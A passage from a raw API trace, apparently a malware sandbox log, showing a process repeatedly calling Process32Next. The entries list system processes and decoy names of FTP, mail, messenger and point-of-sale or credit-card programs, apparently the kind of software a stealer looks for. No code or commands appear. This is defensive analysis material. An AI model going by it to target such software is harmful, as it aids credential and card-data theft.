th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.485] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.488] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0237.490] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.493] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.495] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.498] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.500] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.502] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.505] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.548] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0237.551] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0237.567] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0237.571] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0237.574] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.576] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0237.579] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0237.582] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0237.584] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0237.586] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0237.589] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0237.592] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.594] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0237.657] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0237.659] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0237.663] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.666] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0237.668] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0237.672] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0237.675] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0237.677] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0237.679] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0237.682] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0237.685] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0237.687] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0237.689] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0237.734] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0237.737] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0237.739] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0237.740] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0237.742] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0237.744] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0237.746] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0237.747] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0237.749] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0237.751] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0237.753] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0237.755] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0237.757] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0237.759] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0237.762] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0237.766] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0237.769] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0237.777] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0237.779] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0237.782] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0237.786] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0237.788] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0237.791] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0237.793] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0237.795] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0237.797] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0237.799] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0237.801] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0237.803] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0237.806] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0237.808] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0237.810] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0237.815] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0237.817] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0237.819] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0237.821] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0237.823] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0237.826] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0237.828] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0237.831] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0237.833] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0237.836] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0237.838] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0237.840] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0237.843] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0237.845] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0237.847] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0237.849] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0237.853] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0237.856] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, 